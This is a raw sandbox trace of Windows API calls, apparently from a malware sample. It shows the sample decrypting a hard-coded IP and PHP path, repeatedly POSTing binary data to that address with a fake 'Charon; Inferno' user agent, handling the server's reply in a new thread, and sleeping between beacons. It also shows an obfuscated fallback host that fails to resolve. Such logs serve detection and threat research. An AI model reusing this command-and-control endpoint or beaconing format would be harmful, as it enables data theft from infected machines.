LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.574] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0208.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.575] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0208.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.576] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0208.576] GetProcessHeap () returned 0x690000 [0208.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0208.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.577] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0208.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.578] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0208.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.579] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0208.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.580] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0208.580] GetProcessHeap () returned 0x690000 [0208.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0208.580] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0208.580] GetProcessHeap () returned 0x690000 [0208.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0208.580] socket (af=2, type=1, protocol=6) returned 0x4b0 [0208.580] connect (s=0x4b0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0208.610] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0208.610] GetProcessHeap () returned 0x690000 [0208.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0208.610] GetProcessHeap () returned 0x690000 [0208.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0208.611] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.612] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.612] GetProcessHeap () returned 0x690000 [0208.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0208.612] GetProcessHeap () returned 0x690000 [0208.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.612] GetProcessHeap () returned 0x690000 [0208.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0208.613] GetProcessHeap () returned 0x690000 [0208.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0208.615] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.617] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.617] GetProcessHeap () returned 0x690000 [0208.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0208.618] GetProcessHeap () returned 0x690000 [0208.618] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.618] send (s=0x4b0, buf=0x6ad508*, len=242, flags=0) returned 242 [0208.619] send (s=0x4b0, buf=0x6aba40*, len=159, flags=0) returned 159 [0208.619] GetProcessHeap () returned 0x690000 [0208.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0208.619] recv (in: s=0x4b0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0208.722] GetProcessHeap () returned 0x690000 [0208.733] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0208.737] GetProcessHeap () returned 0x690000 [0208.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0208.737] GetProcessHeap () returned 0x690000 [0208.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0208.738] GetProcessHeap () returned 0x690000 [0208.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0208.738] closesocket (s=0x4b0) returned 0 [0208.738] GetProcessHeap () returned 0x690000 [0208.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0208.739] GetProcessHeap () returned 0x690000 [0208.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0208.739] GetProcessHeap () returned 0x690000 [0208.739] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0208.739] GetProcessHeap () returned 0x690000 [0208.740] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0208.763] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb84) returned 0x4b0 [0208.765] Sleep (dwMilliseconds=0xea60) [0208.775] GetProcessHeap () returned 0x690000 [0208.775] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0208.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.776] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.786] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0208.803] GetProcessHeap () returned 0x690000 [0208.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0208.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.805] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0208.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.806] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.808] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.808] GetProcessHeap () returned 0x690000 [0208.808] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0208.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.809] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0208.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.810] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0208.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.812] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0208.812] GetProcessHeap () returned 0x690000 [0208.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0208.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.813] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.814] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.815] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.816] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.817] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.817] GetProcessHeap () returned 0x690000 [0208.817] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0208.817] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.817] GetProcessHeap () returned 0x690000 [0208.817] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0208.817] GetProcessHeap () returned 0x690000 [0208.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0208.818] GetProcessHeap () returned 0x690000 [0208.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0208.818] GetProcessHeap () returned 0x690000 [0208.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0208.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.819] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0208.838] GetProcessHeap () returned 0x690000 [0208.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0208.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.839] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0208.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.840] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.842] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.842] GetProcessHeap () returned 0x690000 [0208.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0208.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.846] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0208.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.847] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0208.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.849] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0208.849] GetProcessHeap () returned 0x690000 [0208.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0208.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.850] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0208.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.851] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0208.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.852] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0208.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.852] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0208.852] GetProcessHeap () returned 0x690000 [0208.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0208.853] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0208.853] GetProcessHeap () returned 0x690000 [0208.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0208.853] socket (af=2, type=1, protocol=6) returned 0x4b4 [0208.853] connect (s=0x4b4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0208.911] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0208.911] GetProcessHeap () returned 0x690000 [0208.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0208.911] GetProcessHeap () returned 0x690000 [0208.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0208.912] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.913] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.913] GetProcessHeap () returned 0x690000 [0208.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0208.913] GetProcessHeap () returned 0x690000 [0208.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.914] GetProcessHeap () returned 0x690000 [0208.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0208.914] GetProcessHeap () returned 0x690000 [0208.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0208.915] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.916] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.916] GetProcessHeap () returned 0x690000 [0208.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0208.916] GetProcessHeap () returned 0x690000 [0208.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.916] send (s=0x4b4, buf=0x6ad508*, len=242, flags=0) returned 242 [0208.917] send (s=0x4b4, buf=0x6aba40*, len=159, flags=0) returned 159 [0208.918] GetProcessHeap () returned 0x690000 [0208.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0208.918] recv (in: s=0x4b4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0209.018] GetProcessHeap () returned 0x690000 [0209.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0209.020] GetProcessHeap () returned 0x690000 [0209.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0209.021] GetProcessHeap () returned 0x690000 [0209.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0209.021] GetProcessHeap () returned 0x690000 [0209.021] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0209.022] closesocket (s=0x4b4) returned 0 [0209.022] GetProcessHeap () returned 0x690000 [0209.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0209.022] GetProcessHeap () returned 0x690000 [0209.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0209.023] GetProcessHeap () returned 0x690000 [0209.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0209.023] GetProcessHeap () returned 0x690000 [0209.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0209.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x630) returned 0x4b4 [0209.025] Sleep (dwMilliseconds=0xea60) [0209.027] GetProcessHeap () returned 0x690000 [0209.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0209.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.039] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0209.049] GetProcessHeap () returned 0x690000 [0209.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0209.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.050] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0209.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.053] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.058] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.058] GetProcessHeap () returned 0x690000 [0209.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0209.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.059] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0209.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.060] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0209.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.061] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0209.061] GetProcessHeap () returned 0x690000 [0209.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0209.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.062] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.063] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.064] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.065] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.065] GetProcessHeap () returned 0x690000 [0209.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0209.066] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.066] GetProcessHeap () returned 0x690000 [0209.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0209.066] GetProcessHeap () returned 0x690000 [0209.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0209.067] GetProcessHeap () returned 0x690000 [0209.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0209.067] GetProcessHeap () returned 0x690000 [0209.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0209.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.078] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0209.086] GetProcessHeap () returned 0x690000 [0209.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0209.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.087] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0209.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.088] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.089] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.089] GetProcessHeap () returned 0x690000 [0209.090] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0209.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.091] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0209.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.092] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0209.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0209.093] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0209.093] GetProcessHeap () returned 0x690000 [0209.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0209.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.094] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0209.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.095] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0209.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.096] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0209.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0209.097] StrStrA 